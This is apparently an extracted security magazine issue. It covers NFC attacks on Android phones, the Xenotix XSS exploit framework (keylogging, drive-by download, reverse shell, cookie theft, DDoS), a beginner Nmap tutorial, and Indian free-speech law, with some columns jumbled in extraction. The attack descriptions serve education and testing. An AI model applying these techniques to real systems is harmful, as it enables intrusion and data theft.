Page 1

Issue36 – Jan2013 | Page - 1


Issue36 – Jan2013 | Page - 2


Issue36 – Jan2013 | Page - 3

Stand Close to Me & You're pwned! Owning Smart Phones using NFC INTRODUCTION Near Field Communication at glance

What is NFC? NFC or Near Field Communication is a set of standards or protocols to communicate between two devices by either touching or bringing into close proximity (less than 4 cm). The communicating protocols of such devices are based on RFID Standards, including ISO 14443. These standards are defined and extended by the NFC Forum, which was founded on 2004 by some major companies such as Sony, Nokia, Philips, Samsung, etc. The operating Frequency of such communication is merely 13.56 MHz (+/- 7) which is very low. This gives an advantage of

easily integrating into portable devices without the need of much battery power.

Types of Communication There are basically two types of communication possible in NFC based devices:1. Passive: In this type of communication unpowered NFC ―tags‖ can be read using NFC enabled devices. The initiator, that is, the NFC device provides power to the ―tag‖ which re-transmits back with the recorded data. 2. Active: In this type of communication, both devices simulate power to transmit data between each other. It can be more or less generalized as a Peer-to-Peer (P2P) transmission. In this way, binary/multimedia files can be transmitted with ease.


Issue36 – Jan2013 | Page - 4

NFC Stack

Figure 1 – Protocol Layout of NFC Stack

The above figure (Fig. 1) shows the basic protocol layout of the NFC Stack.

TYPE 1 (TOPAZ)

For the purpose of this report, we will be discussing more about the Protocol Layer of this stack which are focused on physical aspect of starting communication and the Application Layer which are focused on how the data are transmitted during the communication.

Type 1 tags use a format sometimes called the Topaz protocol. It uses a simple memory model which is either static for tags with memory size less than 120 bytes or dynamic for tags with larger memory. Bytes are read/written to the tag using commands such as RALL, READ, WRITE-E, WRITENE, RSEG, READ8, WRITE-E8, WRITEN8.

The Protocol Layer There are basically 6 division based on the protocol layers. We will be discussing about the major 4 types, namely Type 1 (Topaz), Mifare Classic, MifareUltralight, and LLCP (P2P).

MIFARE CLASSIC MIFARE classic tags are storage devices with simple security mechanisms for access control. They use an NXP proprietary security protocol for authentication and ci-


Issue36 – Jan2013 | Page - 5

phering. This encryption was engineered and broken in 2007.

reverse

MIFARE-ULTRALIGHT These tags are similar to Topaz tags. They have a static memory layout when they have less than 64 bytes available and a dynamic layout otherwise. The first 16 bytes of memory contain metadata like a serial number, access rights, and capability container. The rest is for the actual data. Data is accessed using READ and WRITE commands. LLCP (P2P) The previous protocol layers have all had initiators and targets and the protocols are designed around the initiator being able to read/write to the target. Logical Link Control Protocol (LLCP) is different because it establishes communication between two peer devices.

NFC Application Layer This layer is focussed mainly on the format through which the data are exchanged between NFC devices or between an NFC device and Tags. NFC uses NDEF or NFC Data Exchange Format, a format which was standardized in NFC Forum, is used to transmit data. This is a simple binary message format. There are many types of message format such as text, url, etc. One example NDEF is given in the next section. For clarity, and because the NDEF format is so important for NFC, we provide another couple of examples here. We start with a ―text‖ which is basically a text type data.

One example NDEF is given in the next section. For clarity and because the NDEF format is so important for NFC, we provide another couple of examples here. We start with a “text” which is basically a text type data. 0000: 03 17 D1 01 13 54 02 65 6E 68 65 6C 6C 6F 0001: 20 63 6C 75 62 68 61 63 6B 20 21 FE Now let‘s decode the NDEF message from the above example:03 - NDEF message start 17 - Payload Length D1 - MB, ME, SR, TNF= ―NFC Forum well-known type‖ 01 - Length of Type, in this case =1 54 - Type of message, in this case =―T‖ which is text 02 - Length of Language code, in this case =2

65 6e - Language Code, in this case =―en‖ 68 65 ... 21 - ―hello clubhack‖ text FE - NDEF Terminator The previous NDEF example had a single byte devoted to the length of the payload. To support payloads longer than 255 bytes, a longer form of NDEF is used. (You can tell which variant to expect by whether the SR bit is set in the first byte of the NDEF record or not).


Issue36 – Jan2013 | Page - 6

Android NFC Stack Our scope will be limited to Android based NFC devices.

Figure 2

The above figure shows you the different libraries which are present in the Android stack. Android NFC stack could be divided into three components - Kernel, NFC Services and the tag (or device) itself. The kernel contains the NFC driver named libpn544_fw.so, which will respond and interact with the necessary NFC signals. The NFC service present in the android device is named as com.android.nfc. It relies on 3 main driver components: libnfc.so, libnfc_jni.so and libnfc_ndef.so. The components are divided on the basis of which component will contain which part of the

to an Android NFC device, the kernel component libpn544_fw.so calls the NFC services. Once the NFC services are called, they receive the NFC data and store the information dividing it into proper categories. The most interesting part among all is the libnfc_ndef.so, which is responsible for the NDEF part. So, if suppose, we want to fuzz the NFC driver, we would be modifying the NFC data, making some modifications in the hex data stored in it, or changing the value of the length of the message, all of which is contained in the NFC component.

NFC ATTACK SURFACE Common NFC based Attack Vectors

ATM Card Skimmers In countries where ATM cards are NFC enabled, the ATM cards could be used to complete transactions using the NFC functionality. So once the card gets in contact with the NFC card reader, the card reader retrieves some of the information from the card, and uses it to complete the payment.

What an attacker could do in this scenario is install his custom NFC enabled card reader in NFC data (JNI, NDEF or any any of the ATMs, which Figure 3 other). accept NFC enabled credit cards. So, once the user goes to the So, in the real scenario, once the tag (or ATM and uses the NFC enabled ATM card, other NFC enabled device) is brought close the attacker‘s card reader would retrieve the


Issue36 – Jan2013 | Page - 7

information, and then pass it to the original card reader machine. So, this could be seen as an example of Man in the Middle Attack. Also, at the end of the day, the attacker could come to the ATM Machine, and take away his installed card reader, and get the information of all the cards used on that ATM on that day. He could then further use that card information, to perform malicious transactions and other activities.

NFC Poster Skimming Another attack vector using NFC could be seen regarding the NFC based POSTERS. The posters are used to provide advertisement where when an NFC enabled device is tapped to the specified location in the poster the information is transferred, for ex-ample we came across an NFC enabled Poster advertising a newly released track by a famous artist in Chicago Figure 4 International Airport. While tapping my GalaxyS3 with that poster I go redirected to a signup form, upon completion I was able to download the trailer of the music video. A phone is a place where most of our private information isstored; an attacker can use this poster to transmit applications to your device hereby compromising security.

NFC Relay Attack This dangerous form of attack compromises the security of all organizations depending upon NFC cards as a proof of identification of customers or employees. An arbitrary example is the company provided id card which we use to get access to the building, an active device can read and copy the data from the passive cards and store it, thereby Figure 5 becoming a clone of the card, now instead of swiping the card, we can swipe the phone containing the data ACCESS GRANTED! This was the company‘s security at risk, now on personal security, an NFC enable credit or debit card will cause enough damage, imagine even without stealing the card from the user data will get transferred whenever an active device is close enough. A harmless dash against a stranger on a busy street will be enough to lose all your bank balance!


Issue36 – Jan2013 | Page - 8

LEVERAGING NFC FOR ANDROID BASED VULNERABILITY NFC AWARE ANDROID MALWARE? For well-known type Tags, the applications are called directly instead of the com.android.tag   

www data fires up the Browser mailto: protocol fires up the email client unexpected values in NDEF crashes NFCService.java

This application is hosted at the github repo: https://github.com/subho007/HTTProxy

USSD Based Attack using NFC Well known USSD vulnerability in Samsung Galaxy devices which resets the complete Device can also be done through a simple

NFC Aware Malware Leveraging the NFC based protocol; a new breed of NFC aware Malware can arises. This kind of Malware can proxy through the request through themselves before the correct application can get activate. One such example is proxy-ing any URL which are stored in an NFC tags, when parsed, fires up the malware instead of the Browser.

Figure 6

Figure 7

NFC tag, which automatically opens up the browser without any user interactions, which in turns dials up the USSD code, which in turn resets the device to factory setting!


Issue36 – Jan2013 | Page - 9

REFERENCES 1. http://developer.android.com/guide/to pics/connectivity/nfc/index.html 2. http://media.blackhat.com/bh-us12/Briefings/C_Miller/BH_US_12_Mill er_NFC_attack_surface_WP.pdf 3. http://nakedsecurity.sophos.com/2012/ 09/24/android-nfc-hack-lets-subwayriders-evade-fares/ 4. http://blackwinghq.com/assets/labs/pr esentations/EddieLeeDefcon20.pdf 5. http://www.slideshare.net/the_netlocks mith/defcon-2012-nearfieldcommunicationrfid-hacking-miller 6. http://www.mulliner.org/nfc/feed/nfc_ ndef_security_ninjacon_2011.pdf

SubhoHalder subho.halder@gmail.com SubhoHalder is Programmer, Security Researcher and Penetration Tester. He is well equipped with programming in PHP, Java and Python. He is well equipped and has a deep understanding of Android and Blackberry frameworks.

Aditya Gupta adityagupta1991@gmail.com Aditya Gupta is the co-founder of XY Securities, an information security firm based in India. His main expertise includes Exploiting Web Applications, Evading Firewalls, Breaking Mobile Security and Exploit Research. Aditya has been a frequent speaker to many conferences including Clubhack, Nullcon, BlackHat, ToorCon.


Issue36 – Jan2013 | Page - 10

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s. XSS got listed as the top 2nd Vulnerability in the OWASP 2010 Web application Vulnerabilities list.

Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications which allows the attackers to inject client-side script into web pages viewed by other users. The execution of the injected code takes place at client side. A cross site scripting vulnerability can be used by the attacker to bypass the Same Origin Policy (SOP). In the past, the potentials of XSS vulnerability were not known. XSS was mainly used for stealing cookies and for temporary or permanent defacements and was not considered as high risk vulnerability. But later XSS tunneling and Payload delivering showed us the potential of XSS Vulnerability. Most of the large websites like Google, Facebook, Twitter, Microsoft, and Amazon etc. even now suffers from XSS bugs. That‘s a brief introduction about XSS.

Threats due to XSS XSS Tunneling: With XSS Tunnel a hacker will obtain the traffic between the victim and a webserver. Client side code injection: A hacker can inject malicious codes and execute them at client side.

Figure 1 - Top 10 Web Application Vulnerabilities OWASP

DOS: A hacker can perform DOS against a remote server or against the client itself.


Issue36 – Jan2013 | Page - 11

Cookie Stealing: A hacker can obtain the session cookies or tokens of a victim. Malware Spreading: A hacker can spread malwares with a website which is vulnerable to XSS. Phishing: A hacker can embed or redirect to a fake page of the website to get the login credentials of the victim. Defacing: Temporary or defacement of web application is possible.

permanent

What is Xenotix XSS Exploit Framework? Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. This tool can inject codes into a webpage which are vulnerable to XSS. It is basically a payload list based XSS Scanner and XSS Exploitation kit. It provides a penetration

Need for a new Tool Many tools are available for detecting XSS vulnerabilities in web applications. But most of these are not so easier to use or you should specify XSS payloads manually. I found many Penetration testers just using <script>alert(‘XSS’)</script> or <script>alert(document.cookie)</ script> as the POC for the detected XSS vulnerability which often fails to create an impression on their clients that XSS is a severe threat. So I thought of the possibility of a new user friendly tool with a payload list to test against XSS in a web application and an XSS Exploitation Framework. After a 5 months research, I built a XSS payload database of over 500+ XSS payloads and implemented a tool in VB.NET and that is Xenotix XSS Exploit Framework.

Figure 2 - Xenotix XSS Exploit Framework

tester the ability to test all the XSS payloads available in the payload list against a web application to test for XSS vulnerabilities. The tool supports both manual mode and automated time sharing based test modes. The exploitation framework in the tool includes a XSS encoder, a victim side XSS keystroke logger, an Executable Drive-by downloader and a XSS Reverse Shell. These exploitation tools will help the penetration tester to create proof of concept attacks on vulnerable web applications during the creation of a penetration test report.


Issue36 – Jan2013 | Page - 12

Features of Framework        

Xenotix

XSS

Built in XSS Payloads Automated Testing XSS Keylogger XSS Executable downloader XSS Payload Encoder XSS Reverse Shell XSS DDoSer XSS Cookie Thief

Exploit

Drive-by

Built in Payload List It is having an inbuilt XSS payload list of above 500+ XSS payloads. It includes HTML5 compactable XSS injection payloads. Most of the XSS filters are implemented using String Replace filter, htmlentities filter and htmlspecialcharacters filter. Most of these weakly designed filters can be bypassed by specific XSS payloads present in the inbuilt payload list.

The above chart shows the number of XSS Payloads in different XSS Scanning tools available in market. Xenotix XSS Exploit Framework got the world‘s second largest XSS Payload list after IBM AppScan Security which is having 700 million payloads. Automatic XSS Testing The tool is having an automatic test mode based on a time interval. You have to specify the time interval according to the time taken by a webpage to load which depends on your bandwidth. It will test all the payloads one by one after the specified time interval. With this feature automated XSS testing can be done. You don‘t have to check all the 500+ payloads manually. XSS Keylogger

Figure 4 - XSS Keylogger Working

The tool includes an inbuilt victim side Key logger which is implemented using JavaScript and PHP. PHP is served with the help of a portable PHP server named QuickPHP by Zach Saw. A JavaScript file is injected into the web application vulnerable to XSS and is presented to the victim. The script captures the keystrokes made by the victim and send to a PHP file which further write down the logs into a text file. Figure 3 - XSS Payload count in different Vulnerability Scanners


Issue36 â&#x20AC;&#x201C; Jan2013 | Page - 13

XSS Executable Drive-by Downloader

and finally it will execute update.exe. The downloading and executing of the malicious executable happened without the knowledge and permission of the victim. XSS Payload Encoder The inbuilt Encoder will allow encoding into different forms to bypass various filters and Web Application Firewalls. The encoder supports Base64 Encoding, URL Encoding, HEX Encoding, HTML Characters Conversion, Character Code Conversion and IP to Dword, Hex and Octal conversions. XSS Reverse Shell

Figure 5 - Executable Drive-by Downloader Working

Java Drive-by download can be implemented with Xenotix XSS Exploit Framework. It allows the attacker to download and run a malicious executable file on the victimâ&#x20AC;&#x2DC;s system without his knowledge and permission. You have to specify the URL for the malicious executable and then embed the drive-by implemented webpage into a XSS vulnerable page and serve your victim. When the victim view the injected page, the java applet client.jar will access the command prompt and with the help of echo command, write down some scripts to a Visual basic script file named winconfig.vbs in the temp directory(%temp%) and then the cmd.exe will start winconfig.vbs. The winconfig.vbs will download the malicious executable specified by you in the URL to temp directory and rename it as update.exe

A XSS Reverse Shell can be implemented with Xenotix XSS Exploit Framework. This is made possible with the help of Java Drive-By. The XSS vulnerable web application exploited with the injectable scripts generated by XSS Reverse Shell when presented to a victim will initiate the drive by download of a Reverse TCP connecting shell. After the drive-by download, the reverse shell is executed by the same method used in Java Drive-by.

Figure 6 - Establishing a reverse shell by exploiting XSS in web applications.


Issue36 – Jan2013 | Page - 14

The advantage of this method is that the reverse shell is downloaded and executed in the victim‘s system without his knowledge. But for the execution of reverse shell, it will pop up a UAC dialog requesting for the permission to run the executable. The tool is having an inbuilt Listener that listens to the reverse shell. It is designed in a user friendly manner. All you have to do is to specify the reverse connection IP and port. XSS DDoSer

Figure 7 - Distributed Denial of Service Attack with Xenotix XSS Exploit Framework

With HTML 5 comes great power. We harvest the power of HTML 5 to abuse the Cross Origin Resource Sharing (CORS) and WebSocket to implement a DDoS attack. WebSocket is a technology that allows web applications to have a bidirectional channel to a URI endpoint. Sockets can send and receive data to and from a web server and respond to opening or closing a WebSocket. The XMLHttpRequest is

down. Along with it by abusing CORS, the add-on creates numerous fake GET requests to slow down the target server. When we send the first request to the target server and the response does not contain the 'Access-Control-Allow-Origin' header with a suitable value then at times the browser refuses to send more requests to the same URL. However this can be easily bypassed by making every request unique by adding a non-existing query-string parameter with changing values.

XSS Cookie Thief It‘s the traditional Cookie Stealer but a bit advanced and with real time cookie viewer. This module allows the pentester to create cookie stealing POC.

a JavaScript object Figure 8 - XSS Cookie Thief Console which is used to exchange data between a server and a bowser behind the scene. This can be used for Cross Origin Resource Sharing (CORS). We can perform a combined and powerful DDoS attack by abusing these two technologies. This module abuses WebSocket and creates numerous socket connections with a target server to slow it


Issue36 – Jan2013 | Page - 15

Testing a website with Xenotix XSS Exploit Framework To test a website URL, say http://www.site.com/search.php?id=1&ter m=about

to tunnel the victim-server traffic will be added in future builds. Automatic detection of parameters or variables vulnerable against XSS and DOM Based XSS detection will be added up in next build.

Conclusion XSS in popular website is a high security threat. Xenotix XSS Exploit Framework can be used by Security Figure 9 - Testing a Website with Xenotix XSS Exploit Framework Analysts to perform penetration test on Suppose you suspect that the variable ‗term‘ Web Applications against XSS vulnerability is vulnerable to XSS. and to create POC with the inbuilt exploitation framework. Most of the security For testing against XSS in Xenotix XSS tools related to XSS are either XSS Scanners Exploit Framework you should specify the or XSS Exploitation tools. Xenotix XSS protocol, which is http or https. Then give Exploitation Framework is the first of its the website URL other than the suspected kind to act both as an XSS vulnerability variable in the field after the protocol and scanner as well as XSS exploitation specify the suspected variable in the framework. Bug bounty programs like Variable to test field. Now select between Google Vulnerability Reward Program, Inbuilt XSS Payloads or Custom XSS Facebook Bounty, Paypal bug bounty etc. payloads. You can select between Manual are there. So go for XSS hunting and grab Mode and Auto Mode to start testing. your bounty.

Features for the Next Build Current version of XSS Exploit Framework is based on Internet Explorer‘s webpage rendering engine Trident. Since XSS got slightly different behavior in different Web Browsers, the support for the Gecko (Used by Mozilla Firefox) and Webkit (used by Chrome, Opera, and Safari) Rendering engines will be added up in the next build. The support for XSS in POST Parameter and XSS testing by modifying the headers will be included in the next build. XSS Proxy


Issue36 – Jan2013 | Page - 16

References Papers 

 

   

Our Favorite XSS Filters/IDS and how to Attack Them - Eduardo Vela and David Lindsay. Blackbox Reversing of XSS Filters Alexander Sotirov. Advanced Cross-Site-Scripting with Real-time Remote Attacker Control Anton Rager Bypass XSS filters - k3nz0 XSS for Fun and Profit - Lord Epsylon Bypassing Web Application Firewalls (WAFs) - Ing. PavolLupták Abusing Internet Explorer 8‘s XSS Filters –Eduardo Vela Nava, David Lindsay

Websites 

OWASP‘s Cross-site Scripting (XSS) https://www.owasp.org/index.php/Cros s-site_Scripting_(XSS) CGISecurity's Cross Site Scripting FAQ http://www.cgisecurity.com/xssfaq.html# Gunter Ollmann's XSS paper http://www.technicalinfo.net/papers/C SS.html PeterW's Cross Site Request Forgery (CSRF) Concept http://www.securityfocus.com/archive/ 1/191390 CERT info on XSS http://www.cert.org/advisories/CA2000-02.html Remote Scripting with IFRAMEs http://developer.apple.com/internet/we bcontent/iframe.html HTML5 Security Cheat sheet http://html5sec.org/#html5

Cross Site Scripting - XSS - The Underestimated Exploit http://www.acunetix.com/websitesecuri ty/cross-site-scripting.htm

Ajin Abraham ajin25@gmail.com Ajin Abraham is an Information Security Researcher currently doing his B-Tech in Computer Science. He is the creator of Xenotix XSS Exploit Framework. He had published different whitepapers and tools in the scope of Information Security. His area of interest includes web application penetration testing, coding tools, exploit development and fuzzing.


Issue36 – Jan2013 | Page - 17


Issue36 – Jan2013 | Page - 18

SCAN YOUR HOME NETWORK WITH NMAP Who should read this article? Everyone that is interested in computer security and computer networking should read this article.

Introduction If you run a network, a small or big one, you need a flexible and productive way to monitor it. You need to provide security to machines connected to your network, especially if you have a WI-FI network. Monitoring the ‗health‘ of your network is an important step to keep attacks, viruses and malwares out of your network perimeter. Ask yourself these questions: ―Is there anybody outside using my wireless internet connection?‖, ―Are my machines and devices secured?‖, ―Is my router firewall working?‖, ―Why is this port open? Is there any virus in my computer that opened that port?‖

What is Nmap? Nmap is a free and open source tool for network discovery, helping us to map the network. Network administrators find it very useful in their daily job, so if you are planning to be a network administrator you should learn how to use Nmap. Nmap can help us to discover how many hosts are in a network, what operating systems are they running, what open ports do they have and services running in these open ports. It is a command line tool but for those that do not like to remember many commands there is a graphical version of Nmap that is called Zenmap. Both Nmap and Zenmap are multi-platform (Linux, Windows, Mac OS X, BSD, etc.), so you do not have to worry about the operating system you need in order to use these tools. Nmap has the ability to save scan results to files and we can use these files for later analyzes. The great thing that i like about Nmap is its scripting engine (NSE). We can write our own scripts and use them with Nmap.

Download and install Nmap a) Installing Nmap on Ubuntu Installing NmaponUbuntu is very easy. Fire up the terminal and type this command ―sudo apt-get install nmap‖ without


Issue36 – Jan2013 | Page - 19

the quotation marks.This simple command does everything; it downloads and installs the Nmap for you. NOTE: You will need root privileges to use Nmap tool on Linux machine. b) Installing Nmap in windows Download the latest release self-installer from the official Nmap page (nmap.org) and double click it.After the installation is completed open command prompt (cmd), type this command ―cd C:\Program Files\Nmap‖ like shown in Figure 1 and hit enter. Type ―nmap‖ like shown in Figure 2 and hit enter.This command gives us information about Nmap usage like options and target specifications so every time we do not remember a command we can type ―nmap‖ in the command prompt and read the output.

The nmap scan report tells us that the host is up and is running a web service in port 80, the port for http (hypertext transfer protocol) traffic. A simple nmap scan will check for the 1000 most commonly used TCP/IP ports and based in the respond that these ports do to the probe Nmap will classify them into one of six port states: open, closed, filtered, unfiltered, open|filtered, closed|filtered.To perform a simple scan in your machine type this command in the command prompt ―nmap localhost‖. Can Nmap be used to scan multiple hosts? Yes,Nmap can be used to scan multiple hosts and the easiest way to do this is to string together the target IP addresses or hostnames separated by a space, like shown in Figure 2.

Figure 2

Scanning with Nmap Performing a simple scan with Nmap requires a target and the target can be specified as an IP address or a hostname. A simple scan does not require any options and the syntax for it is ―nmap IP or HOSTNAME‖. My router is the target in this case; if you need another target then think about your computer; do not scan machines that are not yours.

Figure 1 – Simple nmap scan

Figure 2 demonstrates using Nmap to scan two addresses at the same time (host1 and host2). If the number of hosts is big, than the scanning process will take more time and is good to save the results in a file. Sometimes you want to scan an entire subnet and to do that you need some information about Classless Inter-Domain Routing (CIDR).I will not explain you in this tutorial what CIDR is so feel free to Google it.For now only remember that to scan an entire subnet you need an ip address in the subnet.If you want to scan your entire subnet get your ip and use this syntax: ―nmap [IP/CIDR]‖.What is the value for your CIDR?To find out the CIDR value we will use an online subnet calculator. You can find it


Issue36 – Jan2013 | Page - 20

herehttp://www.subnetcalculator.com/.Put your ip address in the ip box and copy the number in the Mask Bits box.My CIDR is 24.To scan the entire subnet we use this command: ―nmap [IP/24]‖ without quotation marks.This process will take some time and the speed of scanning will depend on your internet connection. If you have a slow connection, feel free to get a coffee.

Figure 3

Nmap accepts text file input, so if you have a large number of machines to scan, you can enter the ip addresses in a text file and use it as input for Nmap. Each entry in the text file must be separated by a space, tab or new line. The syntax for performing this scan is ―nmap –iL filename.txt‖, where the –iL parameter is used to instruct Nmap to extract the list of targets from the filename.txt.

Figure 4

Figure 4 show us that nmap failed to open input file hostlist.txt, which is a text file that contains a list of hosts.In order for this scanning technique to work you need to copy the text file in the Nmap folder.By default, before scanning for open ports,

Nmap sends ICMP echo requests to the host to see if it is online and if the host in not ‗alive‘ Nmap does not probe the host.This can save time when scanning a lot of machines as Nmap will not waste time probing hosts that are not ‗alive‘. The –sP option is used to perform a simple ping and is very useful when you want to see which hosts are online without scanning for open ports. To see which hosts are online in your network type this command ―nmap –sP [IP/CIDR]‖ in the command line and wait for the output. Figure 5 shows that 256 ip addresses in my subnet are pinged and there are only three hosts ‗alive‘.

Figure 5

Determining the operating system of your target is very important because many exploits are specific to a specific platform. The process of discovering the host operating system is called fingerprinting.The syntax for performing operating system detection is ―nmap –O [IP or hostname]‖. Figure 10 shows the output of my os scan detection.


Issue36 – Jan2013 | Page - 21

Sometimes Nmap is unable to detect the operating system and it will provide only a fingerprint,but you can force the os detection by using the –osscan-guess option. But what is the reason that some port is closed or open? The – reason parameter helps us to understand the reason why a port is considered to be open or closed. Figure 6 shows how this option can be used.

open ports and from these open ports we are only interested about 22 and 80 ports.

Figure 7

As you can see from figure 7, we used -p 22,80 to perform a scan on TCP ports 22 and 80. Example 2 How can Nmap help me to discover FTP servers in my subnet? Figure 6

If you want to keep your nmap scanning output simple you can use the –open parameter which helps you to display only the open ports on your target.Sometimes is hard to remember all these commands and to do the job right you can use the –A parameter, which can be used to perform an aggressive scan. This parameter selects some of the most commonly options used with Nmap. Now that we have learned the basics of Nmaplet me takesome examples. Example 1 I want to know if there is any SSH or web server in my subnet. The most popular ports for SSH and web servers are 22 and 80 so we need to use the --open parameter to check only for

File transfer protocol (FTP) is known for its weak security. The issue with file transfer protocol is that all the traffic is sent in plain text meaning that all data can be easily intercepted. An Nmap scan can helps us to identify ftp servers. The command syntax for this scan is ―nmap -sP -p 21 [target/CIDR]‖. Example 3 How to tell if your wireless router has been ―hacked‖ Most wireless routers allow administration through a web page interface. Open a web browser and connect to your router by typing in its IP address. The default IP set for many routers is 192.168.0.1 or 192.168.1.1. If you are not sure about your router‘s IP open the command prompt, type ―ipconfig‖ and then press enter. This command gives you information about the


Issue36 – Jan2013 | Page - 22

internet connection. The IP address under ―Default Gateway‖ should be your router‘s IP. After you have entered router‘s IP address in the web browser, a pop-up window will ask for your username and password. Enter your username and password to log into your router. Search through the administrative menus that your router offers and try to find the place that shows a list of devices using the network. Figure 8 shows all devices connected to my network. Now it is very easy, isn‘t it? If the page shows more DHCP clients than you have, it means that your wireless router has been compromised and you should immediately improve its security.

Figure 9

Figure 9 shows that 2 hosts are up. One of these hosts is my computer and the other one is my router. If the scan shows more than two hosts up it means that someone is using my wireless network.

Conclusion We‘ve looked at the basics we need to know about Nmap. In the next tutorial we‘ll take a look at more advanced stuff and use Nmap in real world examples.

Figure 8

But how can you tell if your wireless router has been ―hacked‖ if you are not the administrator of the router? Nmap does the magic for us. We learned to perform simple ping scan in a subnet by using -sP option. If the command result displays more hosts than you expect, it means that your router has been ―hacked‖. Figure 9 shows the output of my simple ping scan.

OltjanoTerpollari terpollarioltjano@hotmail.com Oltjano is persuing Computer Engineering from Polytechnic University of Tirana. He is passionate about Information Security, Computer Forensics & game development.


Issue36 – Jan2013 | Page - 23

MMRDA grounds, when his website was suspended by Crime Branch, Mumbai and arrested him on the counts of sedition Under Sec. 124 (A) of the Indian Penal Code, Sec. 66A of the Information Technology Act and under the National Emblem Act, 1971.

Offensiveness and Freedom of Speech – A Comparative Study of our Rights and Duties in the Digital World “Freedom of speech does not protect you from the consequences of saying stupid shit.” ― Jim C. Hines Yes, you have guessed it right, it with reference to current things happenings around. Although I had written in one of the earlier editions about Sec. 66A my intention behind writing this article is to give readers a fair idea about legal status in India about the burning issue of Freedom of speech and expression and rights in the digital world.

Industrialist held for "offensive" tweet on Chidambaram's son An industrialist was arrested on Tuesday on charges of posting "offensive remarks" against Union finance minister P Chidambaram's son Karti Chidambaram on micro-blogging site Twitter.

Anti-corruption cartoonist AseemTrivedi arrested on sedition charges

S Ravi, 46, who runs a packaging unit at Sederapet Industrial Estate in Puducherry, in a tweet on October 19 alleged that Karti had "amassed" more wealth than Robert Vadra, UPA chairperson Sonia Gandhi's son-in-law.

AseemTrivedi was exhibiting his political cartoons against Corruption in the anti-corruption protest at the

In another tweet on the same day, he said "as a Tamilian" he felt "bad to have sent P Chidambaram to national

Recent incidents 

http://indiatoday.intoday.in/story/anticorruption-cartoonist-aseem-trivediarrested-on-seditioncharges/1/216643.html


Issue36 – Jan2013 | Page - 24

politics". Ravi has been actively participating in events organized by the India Against Corruption (IAC) in Puducherry. http://articles.timesofindia.indiatimes.c om/2012-1031/india/34836084_1_puducherrydefamation-suit-union-territory 

Two girls in Palghar were arrested over a remark posted on Facebook following Shiv SenasupremoBal Thackeray’s death Police on Sunday arrested a 21-year-old girl for questioning the total shutdown in the city for Bal Thackeray‘s funeral on her Facebook account. Another girl who ‗liked‘ the comment was also arrested. The duo was booked under Section 295 (a) of the IPC (for hurting religious sentiments) and Section 64 (a) of the Information Technology Act, 2000. Though the girl withdrew her comment and apologised, a mob of some 2,000 Shiv Sena workers attacked and ransacked her uncle‘s orthopedic clinic at Palghar. Her comment said ―People like Thackeray are born and die daily and one should not observe a bandh for that.‖ http://timesofindia.indiatimes.com/city /mumbai/Facebook-arrests-Relief-forPalghar-girls-on-thecards/articleshow/17394827.cms

Legal stand I have covered this topic in four parts in order to simplify the things. 1. Definition and explanation of Sec. 66A of the IT Act; 2. Meaning of the term ‗offensive; and 3. Meaning of the term Freedom of Speech and Expression guaranteed under the Constitution of India. 4. Test of Balance of Convenience Sec. 66A reads as – Any person who sends, by means of a computer resource or a communication device,— a) Any information that is grossly offensive or has menacing character; or b) Any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently by making use of such computer resource or a communication device, c) Any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience or to deceive or to mislead the addressee or recipient about the origin of such messages Punishment - Imprisonment for a term which may extend to three years and with fine. Explanation — For the purpose of this section, terms ―electronic mail‖ and ―electronic mail message‖ means a message or information created or transmitted or


Issue36 – Jan2013 | Page - 25

received on a computer, computer system, computer resource or communication device including attachments in text, images, audio, video and any other electronic record, which may be transmitted with the message. The section covers two different acts 1. Sending offensive or menacing messages by using electronic communication means; and 2. Sending false messages with intend to to cheat, mislead or deceive people or to cause annoyance. While proving false message is relatively easy, but the real question is ‗What constitutes an electronic message to be offensive or of menacing character?‘

What constitutes offensiveness? Term ‗offensive‘ has not been defined by the Indian law. Oxford English dictionary defines word ‗offensive‘ as – Causing someone to feel deeply hurt, upset, or angry; While in criminal law, it is necessary to prove that the person has Mensrea i.e. guilty mind behind doing a particular act in order to prove guilt of a person. Hence it can be said that it is a relative term and its interpretation varies from person to person.

Freedom of Speech and Expression Article 19 of the Constitution of India defines Freedom of Speech and Expression as –

(Entire Article is not covered due to limitation of space. You can refer the Constitution of India for the same)

Art. 19 - Protection of certain rights regarding freedom of speech etc. 1. All citizens shall have the right a) to freedom of speech and expression; b) to assemble peaceably and without arms; c) to form associations or unions; d) to move freely throughout the territory of India; e) to reside and settle in any part of the territory of India; and f) omitted g) to practise any profession, or to carry on any occupation, trade or business The aforementioned rights are given subject to reasonable restrictions and considering the laws, rules and regulations made by the central or state government. Supreme Court of India has time to time said that the Freedom of expression and speech is not absolute.

Test of Balance of Convenience It means an objective test applied by the courts to each party's circumstances to establish who is more inconvenienced with having to travel to court. This test of balance of convenience is very critical in interpreting the provisions regarding offensiveness and it is important to note that in some of the recent incidents of arrest the situation prevailing at the site demanded immediate action from Police in order to avoid worsening of situation (I am not defending Police here).


Issue36 – Jan2013 | Page - 26

Conclusion To conclude, I remember this famous quote by George Washington – “If freedom of speech is taken away, then dumb and silent we may be led, like sheep to the slaughter.” But while enjoying our fundamental and constitutional rights, we must not forget our fundamental duties given by the same Constitution. As intention behind this article is to highlight on the legal provisions our rights, I also intend to enumerate our fundamental duties here. As a citizen of India it is expected that we should use our rights keeping in mind our duties and respect the spirit of our Constitution.

f) to value and preserve the rich heritage of our composite culture; g) to protect and improve the natural environment including forests, lakes, rivers and wild life, and to have compassion for living creatures; h) to develop the scientific temper, humanism and the spirit of inquiry and reform; i) to safeguard public property and to abjure violence; j) to strive towards excellence in all spheres of individual and collective activity so that the nation constantly rises to higher levels of endeavor and achievement.

Article 51A – Fundamental Duties It shall be the duty of every citizens of Indiaa) to abide by the Constitution and respect its ideals and institutions, the National Flag and the National Anthem; b) to cherish and follow the noble ideals which inspired our national struggle for freedom; c) to uphold and protect the sovereignty, unity and integrity of India; d) to defend the country and render national service when called upon to do so; e) to promote harmony and the spirit of common brotherhood amongst all the people of India transcending religious, linguistic and regional or sectional diversities; to renounce practices derogatory to the dignity of women;

